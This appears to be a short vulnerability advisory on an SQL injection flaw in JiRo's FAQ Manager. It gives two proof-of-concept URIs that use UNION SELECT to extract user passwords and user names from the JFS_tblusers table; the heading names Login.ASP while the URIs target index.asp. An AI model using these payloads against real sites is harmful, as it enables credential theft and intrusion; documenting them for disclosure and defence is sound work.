JiRo's FAQ Manager Login.ASP SQL Injection Vulnerability

JiRo's FAQ Manager Login.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.asp?tID=-1%20union%20select%200,uPassword,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200
http://www.example.com/index.asp?tID=-1%20union%20select%200,uName,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200